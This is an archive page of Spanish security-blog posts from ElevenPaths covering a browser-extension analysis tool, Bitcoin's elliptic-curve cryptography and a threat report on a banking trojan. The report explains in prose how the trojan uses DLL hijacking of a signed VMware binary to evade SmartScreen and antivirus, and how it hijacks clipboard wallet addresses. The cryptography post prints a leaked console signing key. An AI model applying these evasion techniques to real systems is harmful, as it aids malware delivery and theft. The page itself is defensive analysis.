Hace quince días publicábamos la primera versión de Neto, nuestro analizador de extensiones en Github. Publicada bajo licencia libre, en este tiempo hemos trabajado en una serie de funcionalidades que permitan a los analistas una mejor interacción con cada una de las utilidades de la herramienta además de mejorar su configuración. En este post veremos algunas de las novedades que hemos incluido en esta versión entre las que destaca su interfaz interactiva. Las principales novedades de la versión 0.6 En esta segunda release pública incluimos algunas funcionalidades que consideramos relevantes: La consola de Neto es la principal utilidad incluida en esta versión. Se trata de una pequeña interfaz de comandos que invocamos con neto console y desde la que podremos ejecutar diferentes comandos de análisis de forma interactiva como veremos más adelante en este post. La carpeta de configuración. En esta prerelease también hemos incluido una serie de archivos de configuración que generaremos en la instalación. En sistemas GNU/Linux la carpeta de configuración se creará en /home//.config/ElevenPaths/Neto y será, además del lugar en el que almacenamos los archivos de configuración principales y unos backups, una carpeta de referencia donde almacenar resultados de los análisis. En sistemas Windows esta carpeta se creará en C:/Users//ElevenPaths/Neto. Visualización de características de los análisis realizados en la CLI. De esta manera, el analista podrá comprobar desde la propia línea de comandos las principales características extraídas del en el análisis, como el hash de la extensión, los permisos que utiliza, los scripts que carga en cada pestaña o en background o la valoración que hace Virustotal del archivo entre otras sin necesidad de explorar manualmente el JSON. El JSON se seguirá generando con los datos completos. La forma más sencilla de instalar la herramienta es con el comando de pip: pip3 install neto Los que ya tengamos descargada la versión anterior, tendremos que actualizarla añadiendo --upgrade al comando anterior: pip3 install neto --upgrade En sistemas GNU/Linux dicho comando puede ejecutarse o bien con un perfil de administrador, o bien con sudo o, si no somos administradores y no tenemos privilegios, añadiéndole --user para instalarlo solo para el usuario actual. La consola interactiva Como comentábamos anteriormente, la principal novedad de esta versión ha sido la adición de la consola interactiva de Neto. Con la interfaz de comandos que hemos incluido hemos querido acercar algunas de las funcionalidades de Neto de forma más cómoda para que sea más fácil la exploración de extensiones. Para lanzarla desde línea de comandos utilizaremos neto console, lo que nos abrirá una interfaz interactiva. A partir de ahí, en todo momento podremos apoyarnos en el comando help para ver qué opciones tenemos. Hasta el momento incluimos 13 comandos diferentes con distintas utilidades que ordenamos a continuación en orden alfabético. Donde ha sido posible, hemos implementado la opción de autocompletar. En cualquier caso, si tenemos dudas sobre el funcionamiento de cualquiera de ellas, podremos usar help comando para ver la ayuda sobre el mismo y ejemplos de cómo utilizarlos: analyse. El comando principal de análisis. Irá seguido de las palabras clave «local» o «remote» en función de si la extensión que vayamos a analizar la tenemos almacenada en local o lo que facilitamos es una dirección URL remota. Si seleccionamos la opción local, podemos autocompletar los nombres de las extensiones contenidas en el working_directory que hayamos definido. delete. Un comando para eliminar los análisis realizados. Se encarga de eliminar los archivos de análisis que no nos sean útiles. Podremos hacer referencia al análisis a realizar por medio de las palabras reservadas ALL o SELECTED así como por el nombre de la extensión. Hay que usarlo con cautela para evitar desastres. deselect. Es el comando inverso a deselect. Desmarcará una extensión marcada como seleccionada si se especifica el nombre de la misma de forma literal. Se puede usar también la palabra reservada «ALL» details. Muestra la información más relevante de la extensión que podremos seleccionar usando las funciones de autocompletar. Se trata de la misma información que veríamos tras realizar el análisis usando el CLI. Si queremos los detalles completos del JSON podremos usar full_details. exit. Cierra la consola. full_details. Muestra el JSON correspondiente a la extensión seleccionada. grep. Un comando de búsqueda literal en los análisis ya almacenados. Nos devolverá los nombres de las extensiones que contengan la cadena de texto literal que hayamos incluido a continuación del nombre. Por defecto, la búsqueda se realizará solamente sobre las extensiones que hayan sido seleccionadas. En caso de que no haya ninguna, se realizará sobre todas. help. El comando de ayuda. list. Con él listaremos los análisis realizados. Podremos utilizar además de las palabras reservadas «ALL» y «SELECTED», el wildcard «*» para indicar extensiones que empiecen por una determinada cadena de texto (e. g.: list ad*). select. Es un comando para seleccionar alguna de las extensiones que hayamos visto anteriormente (por ejemplo, para borrarlas o para buscar sobre ellas). set. Se trata de un comando que utilizaremos para modificar algún valor propio de las opciones de la interfaz, como el directorio de trabajo. show. Este comando lo utilizaremos solamente para mostrar información de la herramienta, como los datos genéricos de la misma (usando show info) o las opciones de la interfaz (usando show info). update. Actualiza el listado de extensiones conocidas. Esto es útil si mientras mantenemos la interfaz abierta tenemos otro proceso por detrás (por ejemplo, el CLI lanzado con neto analyse -e miextension.xpi) que sigue añadiendo extensiones. A continuación incorporamos un pequeño vídeo demostrativo de cómo funciona la interfaz de consola que incluimos en Neto Console para que nos hagamos a la idea. Continuará… Aunque el estado de desarrollo de Neto es claramente un work in progress, desde el Laboratorio de innovación de ElevenPaths sí queremos continuar profundizando en las características de la herramienta. Las próximas semanas hablaremos de cómo desarrollar nuevos plugins de análisis para añadir nuevas características que encontremos en las extensiones y de algunos casos en los que la herramienta nos puede servir de ayuda para analizar de un vistazo las características de una extensión. Mientras tanto, para ir mejorando poco a poco siempre podéis dejarnos vuestras dudas con respecto a cómo funciona como issues en el propio proyecto de Github. Cualquier idea será bien recibida. Félix Brezo Innovation and Laboratory Team ElevenPaths @febrezo felix.brezo@11paths.com
21 de mayo de 2018
Colisiones, haberlas hay(las). Parte 2
En nuestra entrada anterior sobre este tema, terminamos el post preguntándonos: ¿Existirán colisiones en los algoritmos utilizados en Bitcoin?, pues vamos a analizarlo. La criptografía de Bitcoin Los principales organismos reguladores NIST, FIPS, la misma NSA, el MITRE y los gigantes del sector privado, con Google a la cabeza; se preocupan muy mucho por la seguridad de los criptosistemas de uso general, pero… ¿Quién vela por la seguridad de las criptodivisas como el Bitcoin? ¿Existen colisiones en los algoritmos utilizados en Bitcoin? El protocolo Bitcoin hace uso de tres algoritmos criptográficos: ECDSA: en la firma y verificación de transacciones, a partir de claves privadas y públicas (criptografía asimétrica). SHA-256 y RIPEMD160: como algoritmos de Hash (resumen criptográfico) en varios usos. Algoritmo ECDSA ECDSA es una modificación del algoritmo de Firma Digital DSA para ser utilizado con operaciones sobre “Curvas Elípticas” ECC, en lugar de basarse en sistemas de exponenciación o factorización, como los utilizados por DSA o RSA. Estos requieren un tamaño de clave muy superior para obtener un mismo nivel de seguridad, siendo hasta 400 veces más lentos. Una curva elíptica es una curva plana definida por una ecuación cúbica de tercer grado de la forma: y^2=x^3+ax+b Para sus usos en criptografía se definen sobre un cuerpo finito de números enteros. Existen diferentes organismos que definen los parámetros de las curvas elípticas empleadas en criptografía. Los principales son: ANSI, IEEE, NIST o Brainpool, siendo el más extendido y reconocido SECG (Standards for Efficient Cryptography Group) por su carácter independiente. Cada criptosistema de curva elíptica consta de unos determinados “parámetros de dominio” que especifican los valores necesarios para establecer el campo finito, los coeficientes y demás elementos que definen la curva. Se expresan en una séxtupla T = (p, a, b, G, n, h), siendo: El número de elementos del cuerpo finito (p) Los coeficientes (a y b) Las coordenadas del punto base G (x,y) El orden del punto de la curva (n) El cofactor (h) Una de las curvas elípticas más utilizadas en criptografía es la “NIST P-256”, igualmente definida por el SECG como “secp256r1”, y por el ANSI X9.62 como “prime256v1”. Esta es la única curva, junto a la P-384 y P-521, que cumple con los requisitos de seguridad de la Suite B de la NSA (estándar de factor para el entorno militar de la OTAN). Sus parámetros son: p = 115792089210356248762697446949407573530086143415290314195533631308867097853951 a = -3 b = 41058363725152142129326129780047268409114441015993725554835256314039467401291 x = 48439561293906451759052585252797914202762949526041747995844080717082404635286 y = 36134250956749795798585127919587881956611106672985015071877198253568414405109 n = 115792089210356248762697446949407573529996955224135760342422259061068512044369 h = 1 Podemos ver un ejemplo de utilización de esta curva en la firma de los certificados digitales que emplean las principales webs de Internet. Véase el siguiente correspondiente a google.com: No obstante, esta no es la curva que utiliza el protocolo Bitcoin, el cual usa la curva “secp256k1”. Únicamente definida por el SECG, ortográficamente sólo cambia una “r” por una “k”, pero sus parámetros de dominio varían sustancialmente. La letra “r” hace referencia a “random” ya que sus parámetros de dominio han sido seleccionados de forma “teóricamente” aleatoria. También son conocidas como curvas sobre cuerpos primos o “Prime”. Sin embargo, la letra “k” hace referencia a “Koblitz”, por tratarse de un tipo de curvas binarias anómalas denominadas así en honor al profesor de matemáticas Neal Koblitz (co-autor junto a Victor S. Miller de la criptografía de curvas elípticas a mediados de los 80’s), cuyos parámetros de dominio no son elegidos al azar, si no, “rígidamente” calculados. También son conocidas como curvas sobre cuerpos binarios, aunque existen curvas sobre cuerpos binarios que no son curvas de Koblitz (ej. NIST B). Los parámetros de dominio de la curva “secp256k1” utilizada en el protocolo Bitcoin son los siguientes: p = 115792089237316195423570985008687907853269984665640564039457584007908834671663 a = 0 b = 7 x = 55066263022277343669578718895168534326250603453777594175500187360389116729240 y = 32670510020758816978083085130507043184471273380659243275938904335757337482424 n = 115792089237316195423570985008687907852837564279074904382605163141518161494337 h = 1 Quedando simplificada su ecuación de la siguiente manera: y^2=x^3+7 Matemáticamente, las curvas de Koblitz son unos pocos bits más débiles que otras curvas. Para obtener el mismo grado de seguridad que una curva Prime con clave de 256 bits, una curva Koblitz requiere una longitud de clave de 283 bits. La mayor estructura que presentan estas curvas permie realizar ataques más eficientes, además de que el cálculo de multiplicación escalar es mucho más rápido que en otro tipo de curvas. No obstante, las curvas “secp256r1” y “secp256k1” tienen una seguridad equiparable. Si consideramos solo los ataques conocidos hoy, poseen una seguridad prácticamente idéntica. Sin embargo, con la excusa de no disponer de suficientes garantías frente al criptoanálisis, ninguna curva de Koblitz, independientemente de su longitud de clave, ha sido recogida en las definiciones de organismos como la NSA, el ANSI, o Brainpool. Por el contrario, una importante corriente de investigadores denuncia la imposibilidad de verificar la verdadera “aleatoriedad” de los parámetros de dominio definidos para las curvas Prime, como la “secp256r1”, alimentando las sospechas sobre la existencia de una “puerta trasera” introducida por la NSA, desde que en el año 2006 el NIST adoptara varios algoritmos propuestos por la agencia. Tan solo un año más tarde, en 2007, dos investigadores de Microsoft, Dan Shumow y Niels Ferguson, concluyeron que uno de estos algoritmos de la NSA, el “Dual_EC_DRBG” (Dual Elliptic Curve Deterministic Random Bit Generator) era potencialmente inseguro. Pero no fue hasta junio de 2013, cuando Edward Snowden, antiguo empleado de la CIA y la NSA, hizo públicos un elevado número de documentos secretos, donde pudo verificarse que se trataba de una puerta trasera de la NSA, e incluso que fue desarrollada por la compañía RSA, al precio de 10 millones de dólares. El algoritmo Dual_EC_DRBG fue inmediatamente retirado y el NIST emprendió una campaña para lavar su imagen, en la que todavía continua inmerso. De forma similar a cualquier otro criptosistema, los algoritmos de curva elíptica están en constante evaluación mediante diferentes técnicas de criptoanálisis; desde simples ataques de fuerza bruta, hasta los más complejos ataques de Pohlig-Hellman, de Shor, de BGGS (Baby Step, Giant Step), de MOV (Menezes-Okamoto-Vanstone), de Pollard, de Frey-Rück o Index-Xedni-Calculus, pasando por cualquier aplicación de teorías de grupos o giros cuadráticos. Hasta la fecha, no se han encontrado debilidades, ni vulnerabilidades en el diseño de estos criptosistemas, aunque existen varios casos en los que una implementación deficiente del algoritmo, provocó un importante incidente de seguridad. Uno de los casos más sonados fue el de Sony con su PlayStation 3. La tercera versión de la popular consola de videojuegos lanzada en 2006, empleaba ECDSA como algoritmo de firma digital para validar el software que podía ser ejecutado, impidiendo así la posibilidad de ejecución de programas y juegos no autorizados. El proceso de firma digital requiere, además de la clave privada, un número aleatorio que no debe reutilizarse. Sorprendentemente Sony utilizó el mismo valor en todas las firmas de código que emitía. Esta debilidad fue anunciada por el grupo de investigadores “fail0verflow” en 2010, y poco después George Hotz “Geohot” consiguió explotarla para obtener la clave privada de Sony, y la publicó en su web personal; aunque hoy está ya deshabilitada, es bien conocida: “BA9055916861B977EDCBED92005092F66C7A3D8D”. La generación de números aleatorios es un proceso crítico para cualquier criptosistema. Las autoridades de certificación y otros organismos que requieren de garantía absoluta de aleatoriedad, recurren a hardware específicamente diseñado para este propósito. Pero para un uso ordinario, se delega en el Sistema Operativo la generación de números aleatorios. Son conocidos varios incidentes de seguridad provocados por una utilización defectuosa de la generación de números aleatorios en procesos criptográficos, aunque no transcendían más allá de una pequeña reseña, normalmente cuando ya estaban corregidos. La aparente inocencia con la que eran percibidos los defectos de aleatoriedad, se tornó dramática en el verano de 2013, cuando salió a la luz una vulnerabilidad en la clase Java SecureRandom del SDK de Android que afectaba todas las versiones anteriores a la v4.2, lo que en aquella época suponía la práctica totalidad de tablets y smartphones Android (CVE-2013-7372). El impacto de esta vulnerabilidad fue terrible para los usuarios de wallets de Bitcoin para Android, estando afectados la mayoría de los existentes entonces: Bitcoin Wallet, BitcoinSpinner, Mycelium y Blockchain.info. Todos los fondos depositados en estas carteras fueron sustraídos. Se alertó desde la web Bitcoin.org, y aunque los desarrolladores publicaron rápidamente actualizaciones que parcheaban el problema, el daño ya estaba hecho. No fue posible cuantificar las cantidades sustraídas al tratarse de un robo que afectaba de forma individual a cada usuario, pero se sabe que fueron miles los que perdieron todos sus bitcoins. Google reconoció el error, corrigiéndolo con celeridad. Pero ya era tarde, no existía posibilidad alguna de recuperar las cantidades usurpadas, ya que las transacciones quedan inmutablemente recogidas en la blockchain. Se desconocen los verdaderos motivos por los que el creador de Bitcoin eligió para el algoritmo ECDSA una curva de Koblitz en lugar de una curva Prime. Puede que simplemente se fiara más del profesor Neal que de la NSA. Vitalik Buterin, ferviente seguidor de Bitcoin y la postre creador de Ethereum, comentaba en la Bitcoin Magazine, como Satoshi Nakamoto había encontrado formas inesperadas de esquivar “balas criptográficas”, tanto por elegir una curva de Koblitz, como por definir que las direcciones de pago de Bitcoin como un hash de la clave pública en lugar de la propia clave pública. Pero, ¿son estas precauciones suficientes?, ¿los algoritmos de hash utilizados SHA-256 y RIPEMD160 son suficientemente seguros?, ¿hay colisiones en las direcciones de Bitcoin? Te lo contaremos todo en la tercera parte, no te pierdas la próxima entrega! Y recuerda que si tienes dudas o quieres discutir más sobre el tema, puedes visitarnos en la Comunidad de ElevenPaths. » Colisiones, haberlas hay(las). Parte 1 Jorge Rivera CSA, Chief Security Ambassador jorge.rivera@11paths.com » Colisiones, haberlas hay(las). Parte 1 » Colisiones, haberlas hay(las). Parte 3 » Colisiones, haberlas hay(las). Parte 4
17 de mayo de 2018
Eventos del mes de mayo en los que participan nuestros expertos
¡Hola hackers! Un mes más, presentamos los eventos en los que participamos y que no debes de perderte para estar al día en seguridad informática. Security Day 2018 - Cybersecurity On Board Ya tenemos fecha para nuestro evento anual de ciberseguridad consolidado como un evento de referencia en el sector de la seguridad de la información y TIC a nivel nacional, Security Day 2018. El próximo 30 de mayo celebraremos esta jornada anual en la que presentamos, de la mano de nuestros partners y expertos, las últimas novedades de nuestras tecnologías. Este año nuestro lema es ' Cybersecurity On Board', un valor intrínseco a todos los productos de la compañía que se materializa en un viaje de acompañamiento end to end. Un sello de calidad que garantiza un camino seguro para que las empresas que confían en nuestros servicios crezcan. Un viaje, en el que ElevenPaths acompaña a todos sus clientes, hasta lograr que alcancen la madurez en seguridad de cada uno de ellos necesita. Accede a la web del evento y entérate de todas las novedades tecnológicas que vamos a presentar el próximo 30 de mayo en el Auditorio Central de Telefónica, Madrid. Además, también puedes encontrar información sobre la agenda, los ponentes e información sobre ediciones anteriores. Reserva tu asiento cuanto antes porque el aforo es limitado. ¡ Regístrate aquí! Además, no te olvides de seguir el hashtag #SD2018 con el que comunicaremos las últimas actualizaciones del evento. Síguenos en nuestra red social Twitter: @ElevenPaths Hack Miami Conference El próximo 19 de mayo el CSA Manager, Claudio Caracciolo, junto a Rafael Ortiz, viaja a Florida para asistir a la conferencia HackMiami 2018. Presentarán la charla de " Breaking out HSTS (and HPKP) on Firefox and Chrome" a las 10:00h (CST). Accede a la web y regístrate al evento. Info Security 2018 Fabián Chiera, CSA panameño, estará el miércoles 23 de mayo en Info Security 2018, uno de los eventos líderes en ciberseguridad e IT de México. Además, consta con un programa educativo de alto nivel con expertos naciones e internacionales. Fabián hablará sobre Blockchain y los Smart Contracts, seguridad más allá de la criptografía. Big Data for Social Good 2018 - LUCA LUCA, la unidad de Telefónica especializada en Big Data, celebra la mañana del próximo 24 de mayo, el evento anual Big Data for Social Good 2018, con el lema " Ready for a Wild World". Vivimos en un mundo cada vez más digitalizado en el que la actividad humana genera una inmensa cantidad de datos. Toda esta información, junto a un análisis avanzado de la misma, está ayudando a cambiar y mejorar nuestra sociedad: desde señalar zonas de riesgo de inundación hasta analizar el nivel de analfabetismo en zonas de difícil acceso o predecir la difusión de enfermedades como el Zika. Accede a la web del evento para más información. ElevenPaths Talks Si eres de los que les apasiona el mundo de la tecnología y seguridad, no te pierdas este webinar de nuestra serie #11PathsTalks en el que nuestros CSAs e invitados estrellas hablan sobre Smart Contract. También, mencionarán las principales recomendaciones de seguridad a la hora de elaborarlos, y las diferentes técnicas de auditoría de código y verificación de contratos. No te pierdas este webinar con casos de usos prácticos y reales donde ya se está utilizando esta tecnología de forma exitosa. ¡Aprende con nuestros CSAs! Code Talks for Devs El próximo 23 de mayo, los expertos Guillermo Román Ferrero y Javier Gutiérrez Navío hablan sobre 'Air Profiling' y cómo hacer perfiles de usuarios procesando su tráfico de red. No te pierdas este webinar en el que explicamos este proyecto y su objetivo principal: explotar las inseguridades en las redes Wireless y el uso de protocolos no seguros. ¿Quieres saber más? Apúntate la fecha, te esperamos. Esto es todo hacker, os esperamos el mes que viene con muchos más eventos y conferencias de hacking y ciberseguridad. Let's hack!
11 de mayo de 2018
Nuevo informe: Sofisticado troyano contra bancos chilenos utiliza software popular como "malware launcher" para eludir SmartScreen
ElevenPaths ha identificado un troyano bancario brasileño mejorado y evolucionado (muy probablemente procede del Kit KL Banker), que utiliza una nueva técnica para eludir el sistema de reputación SmartScreen y evitar la detección en Windows. El troyano descarga programas legítimos y los utiliza como "malware launcher" aprovechando el DLL hijacking en el software. De este modo, el malware puede ejecutarse "indirectamente" y eludir el sistema de reputación SmartScreen e incluso algunos antivirus. En medio de la plaga de ransomware que estamos presenciando, los troyanos bancarios resisten. ElevenPaths ha analizado lo que hemos denominado "N40", un malware en evolución que (al margen de sus capacidades como troyano bancario) resulta bastante interesante en relación con la forma en que trata de eludir los sistemas de detección. El troyano es, en cierto modo, un clásico malware bancario brasileño (superposición en pantalla, programación en Delphi...) que roba credenciales de varios bancos chilenos, pero lo que lo hace aún más interesante son algunas de las características que incluye, que no son tan comunes en este tipo de muestras maliciosas. DLL Hijacking Un ataque de DLL Hijacking no es nuevo. Consiste básicamente en un programa que no comprueba correctamente la ruta de carga de la DLL. Esto permitiría a un atacante con la capacidad de reemplazar o instalar una nueva DLL en alguna de las rutas, ejecutar código arbitrario cuando se lanza el programa legítimo. Este es un problema conocido (siguen apareciendo CVEs al respecto después de años de ser descubierto), sin embargo no todos los problemas de secuestro de DLL tienen la misma gravedad. Algunos problemas son mitigados de diferentes formas de acuerdo al orden de carga de las DLL, la forma en que se establecen los permisos donde se encuentra el archivo ejecutable, etc. Este malware es consciente de ello y ha convertido los problemas del DLL Hijacking "menos graves" en una ventaja para que los atacantes eviten los sistemas de detección y, a su vez, ha convertido simples DLL hijackings en una potente herramienta para los desarrolladores de malware. Esto probablemente obligará a muchos desarrolladores a comprobar de nuevo la forma en que cargan las DLL desde el sistema, si no quieren ser utilizados como "lanzadores de malware". Alguna de las DLL susceptibles de tener problemas de DLL hijacking Lo que hace que este malware sea realmente diferente es que utiliza dos etapas. El downloader (primera etapa) descarga una copia desde un servidor de un programa legítimo que sufre un DLL Hijacking. Es el archivo ejecutable original, firmado y legítimo, por lo que no generará ninguna alerta. Posteriormente, descarga el malware (segunda etapa) en el mismo directorio; se trata de una DLL firmada con certificados vendidos en el mercado negro. Estos certificados contienen el nombre de jóvenes empresas británicas reales, pero lo más probable es que estos certificados no sean robados, sino que se hayan creado a partir información de las empresas expuesta en fuentes públicas. En este caso, el malware abusa de un problema de DLL Hijacking en VMnat.exe, que es un programa independiente que viene con varios paquetes de software de VMware. VMnat.exe (como muchos otros programas) intenta cargar una DLL del sistema llamada shfolder.dll (específicamente la función SHGetFolderPathw). Primero intenta cargarlo desde la misma ruta en la que se llama a VMnat.exe; si no se encuentra, lo comprobará en la carpeta del sistema. Lo que hace el malware es colocar tanto el VMnat.exe legítimo como un archivo malicioso rebautizado como shfolder.dll (que es el propio malware firmado con un certificado) en la misma carpeta. VMnat.exe es entonces lanzado por el "malware de primera etapa", el cual primero encuentra el sfholder.dll malicioso y luego lo carga en su memoria. El sistema está ahora infectado, pero lo que el SmartScreen percibe es que lo que se ha ejecutado es un archivo con buena reputación. A través de este innovador movimiento el atacante puede: Evitar las firmas de antivirus fácilmente, pero no puede bypassear tan fácilmente la seguridad de los endpoints (heurística, hooking). El lanzamiento de vmware.exe es de hecho menos sospechoso y, por ello, el malware entra por esta vía, a través de algún tipo de ejecución de "segunda etapa" que es menos ruidosa dentro del sistema. SmartScreen se basa en la reputación y es difícil de eludir para los atacantes. Por esta razón, la ejecución de un archivo ejecutable legítimo como VMware.exe y la carga de una DLL firmada (que a su vez es malware) hace que a SmartScreen le resulte mucho más difícil de detectar la potencial infección. Más funcionalidades interesantes Este malware, por supuesto, utiliza algunas otras técnicas interesantes pero también vistas con anterioridad. Está muy ofuscado y empacado para eludir firmas estáticas (al menos temporalmente) y utiliza la "decodificación de cadenas en tiempo real". Cuando se lanza, mantiene cada una de las cadenas cifradas en memoria, y solo las descifra cuando es estrictamente necesario. Esto le permite ocultarse incluso cuando un analista o sandbox vuelca la memoria. El clipboard criptohijacking es también un vector de ataque interesante. El malware está continuamente revisando el portapapeles de la víctima. Si se detecta un wallet de Bitcoin, la sustituye rápidamente por una billetera controlada por el atacante, en concreto, se ha identificado la siguiente: 1CMGiEZ7shf179HzXBq5KKWVG3BzKMKQgS. Cuando la víctima quiere hacer una transferencia de Bitcoin, normalmente copiará y pegará la dirección de destino. En este caso, el malware la cambiará al vuelo, esperando que el usuario confíe inconscientemente en la acción del portapapeles y confirme la transacción. Esta es una nueva técnica de robo de bitcoins que está empezando a convertirse en una tendencia. En esta dirección Bitcoin, hemos podido comprobar que en el pasado ha llegado a manejar 20 bitcoins, algunos de estos fondos han sido transferidos directamente a otra dirección bitcoin (supuestamente propiedad de los creadores) con 80 bitcoins. Esto significa que los atacantes disponen de abundantes recursos y parece que han tenido bastante éxito. La cartera en el malware envía el dinero a esta otra cartera, con hasta 80 bitcoins Conclusiones Este malware proviene de Brasil, pero está dirigido a los bancos chilenos más populares. Utiliza debilidades desconocidas hasta ahora en software conocido para eludir algunas técnicas de detección. Es un interesante paso adelante en la forma en que se ejecuta el malware en el ordenador de la víctima. VMware ha sido alertado al respecto y ha mejorado rápidamente su seguridad. Sin embargo, este no es un problema específico de VMware, cualquier otro programa de buena reputación con la vulnerabilidad de DLL Hijacking (que son muchos) puede ser utilizado como "malware launcher". Esto ofrece mucho margen para que los creadores de malware utilicen software legítimo y firmado como una técnica de ejecución menos ruidosa. Además, utiliza muchas otras técnicas de vanguardia como el clipboard cryptohijacking, la comunicación con el C&C a través de puertos no estándar que dependen de sistemas DNS dinámicos, el descifrado de cadenas de memoria solo cuando es estrictamente necesario, etc. Todo esto lo convierte en una pieza de malware muy interesante para tener en cuenta cómo están evolucionando los atacantes para evitar ser detectados, incluso un paso por delante de la escuela rusa, que tradicionalmente son más innovadores en el campo del malware. En resumen: Nos encontramos ante una evolución del malware brasileño que contiene técnicas muy avanzadas (además de las tradicionales que no mencionamos pero que resultan estándar en el malware actual) contra los analistas, antivirus y efectivas a su vez contra las entidades bancarias. En resumen, sus puntos fuertes son: Su capacidad de pasar desapercibido: A través del uso de un fallo previamente desconocido en un software popular para ser lanzado. Evitando ser lanzado si encuentra software que le resulte "incómodo" en la víctima. Analizando el software antivirus en la víctima para tener sus propias estadísticas. Cifrando/descifrando las cadenas en memoria recurrentemente. Utilizando canales de comunicación no estándar. Firmando los binarios. Su capacidad de dificultar el análisis: Empacando el software. Rutinas complejas y cadenas ofuscadas. Dejando buena parte de la lógica del lado del servidor. Su capacidad de ataque: Clipboard criptohijacking. Troyano bancario "tradicional" RAT "tradicional". En el informe a continuación se puede encontrar información más concreta e IOCs específicos de la amenaza analizada. Innovación y laboratorio en Chile y España www.elevenpaths.com
10 de mayo de 2018
Nueva herramienta: Neto, nuestra suite de análisis de extensiones Firefox, Chrome y más
En el área de innovación y laboratorio de ElevenPaths, hemos creado una nueva herramienta para analizar extensiones de navegador. Aunque más que una herramienta, supone toda una suite (además, extensible con sus propios plugins) para el análisis de extensiones, es sencilla de usar y proporciona información útil sobre características propias de extensiones tanto de Firefox como de Chrome u Opera. ¿Por qué analizar extensiones? Las extensiones contienen información relevante como la versión, el idioma por defecto, los permisos que requiere para su correcto funcionamiento o las estructuras de las direcciones URL sobre las que la extensión operará. Asimismo, contiene apuntadores a otros archivos como la ruta relativa del fichero HTML que se cargará al hacer clic sobre su icono o referencias a los ficheros JavaScript que se deberán ejecutar tanto en segundo plano ( background scripts) como con cada página que cargue el propio navegador ( content scripts). Sin embargo, el análisis los ficheros que conforman una extensión también puede desvelar la existencia de archivos que no deberían estar presentes en aplicaciones en producción. Entre ellos, podrían aparecer archivos vinculados a la gestión de versiones como GIT u otros archivos temporales y de respaldo. Por supuesto, también existen las extensiones creadas como malware, adware, o para espiar al usuario. Los ejemplos son muchos y variados, sobre todo recientemente en Chrome (donde ya se ha alcanzado cierto nivel de madurez, incluso) y en Firefox. La "moda" en estos momentos, es sobre todo la minería oculta en extensiones. La herramienta Es una herramienta escrita en Python 3 y distribuida como paquete de PIP, lo que facilita la instalación automática de dependencias. $ pip3 install neto En sistemas en los que no se dispongan de privilegios de administración, se puede instalar el paquete en el usuario actual: $ pip3 install neto --user Una vez instalado, se nos creará un entry point en el sistema con el que podremos llamar a la aplicación de línea de comandos desde cualquier ruta. Funcionalidades principales de la herramienta. Las funcionalidades que hemos incluido en esta primera versión son dos: El analizador en sí, (extensible a través de plugins para ampliar su potencia) Un daemon con una interfaz JSON RPC que nos permitirá interactuar con el analizador desde otros lenguajes de programación. Las distintas opciones del analizador se pueden explorar con neto analyser --help. En cualquier caso, Neto nos permitirá procesar extensiones de tres formas diferentes: Indicando la ruta local a una extensión que tengamos descargada (con la opción -e), Indicando un directorio del sistema en el que tengamos varias extensiones (con la opción -d) Descargándolas directamente desde una URI en internet (con la opción -u). En todos estos casos, el analizador almacenará el resultado como JSON en una nueva carpeta llamada output, aunque dicha ruta también es configurable con el comando -o. Para interactuar desde otros lenguajes de programación hemos creado un daemon que levanta una interfaz JSON-RPC. De esta manera, si lo arrancamos con neto daemon podremos conseguir que el analizador en Python lleve a cabo determinadas tareas, como el análisis de extensiones almacenadas en local (indicándole el método «local») o que están disponibles online a (indicándole el método «remote»). En ambos casos, los parámetros que espera el daemon se corresponden con las rutas locales o remotas de las extensiones a analizar. Las llamadas disponibles se pueden consultar con el método «commands» y se pueden efectuar directamente con curl como sigue. $ curl --data-binary '{"id":0, "method":"commands", "params":[], "jsonrpc": "2.0"}' -H 'content-type:text/json;' http://localhost:14041 En cambio, si estamos programando en Python, Neto también ha sido diseñado para funcionar como una librería. $ Python 3.6.5 (v3.6.5:f59c0932b4, Mar 28 2018, 16:07:46) [MSC v.1900 32 bit (Intel)] on win32
Type "help", "copyright", "credits" or "license" for more information.
>>> from neto.lib.extensions import Extension
>>> my_extension = Extension ("./sample.xpi")
De esta manera, podremos acceder a las diferentes características del análisis realizado contra la extensión, bien accediendo directamente a las propiedades… $ >>> my_extension.filename
'adblock_for_firefox-3.8.0-an+fx.xpi'
>>> my_extension.digest
'849ec142a8203da194a73e773bda287fe0e830e4ea59b501002ee05121b85a2b'
>>> import json
>>> print(json.dumps(my_extension.manifest, indent=2))
{
"name": "AdBlock",
"author": "BetaFish",
"version": "3.8.0",
"manifest_version": 2,
"permissions": [
"http://*/*",
"https://*/*",
"contextMenus",
"tabs",
"idle",
…
Os dejamos un pequeño vídeo con un uso básico. Plugins y cómo contribuir Siendo software libre, para aquellos que quieran contribuir, existe la posibilidad de hacerlo a través del repositorio de Github. La estructura de plugins que podemos encontrar en la ruta neto.lib.plugins permite la adición de nuevos criterios de análisis estático, teniendo en cuenta en función de las necesidades del analista. Esto convierte a Neto en una suite de análisis que esperamos resulte potente. Además, la ventaja que entraña que se distribuya a través de PyPI como paquete es que siempre que se añada alguna nueva funcionalidad esta podrá ser instalada con pip indicando la opción --upgrade. $ pip install neto --upgrade Próximamente tendremos más formas de distribuirlo y mucha más información. Innovación y laboratorio www.elevenpaths.com
8 de mayo de 2018
ElevenPaths y la Universidad Carlos III participarán en la prestigiosa IEEE Conference on Communications and Network Security en Pekín
Una investigación promovida desde el área de innovación y laboratorio de ElevenPaths, y desarrollada en conjunto con la Universidad Carlos III de Madrid ha sido aceptada para participar en la IEEE Conference on Communications and Network Security en Pekín que tendrá lugar a finales de mayo y donde se presentarán los resultados. La IEEE Conference on Communications and Network Security (IEEE CNS) se enmarca dentro de una serie de conferencias de la the IEEE Communications Society (ComSoc) y es la única que se enfoca en la ciberseguridad. IEEE CNS proporciona un foro de primer nivel para investigadores y otros profesionales del sector (académico o no) para aportar ideas, técnicas, herramientas o experiencias relacionadas con todos los aspectos de la ciberseguridad. IEEE CNS 2018 acumula una experiencia de cinco años ya dando voz a investigaciones de calidad que provienen tanto de la academia, como del gobierno y la industria. Este año se celebra el 30 de mayo y 1 de junio en Pekín. La investigación presentada "SignatureMiner: A fast Anti-Virus signature intelligence tool" ha sido realizada utilizando los datos de las innovadoras herramientas de seguridad aportadas por ElevenPaths (como Tacyt) y el dilatado conocimiento de la Universidad Carlos III en el manejo y procesamiento de big data y machine learning. En este ocasión la investigación se centra en el análisis de las firmas antivirus en su plano más genérico, y en la utilidad que aportan a la hora de clasificar malware, para poder realizar un preanálisis y optimizar así el tratamiento de las propias muestras. Fruto de esta colaboración se espera no solo entender y mejorar la ciberseguridad en general sino integrar este conocimiento generado para potenciar e innovar en los productos y servicios más representativos desarrollados por ElevenPaths. Innovación y laboratorio 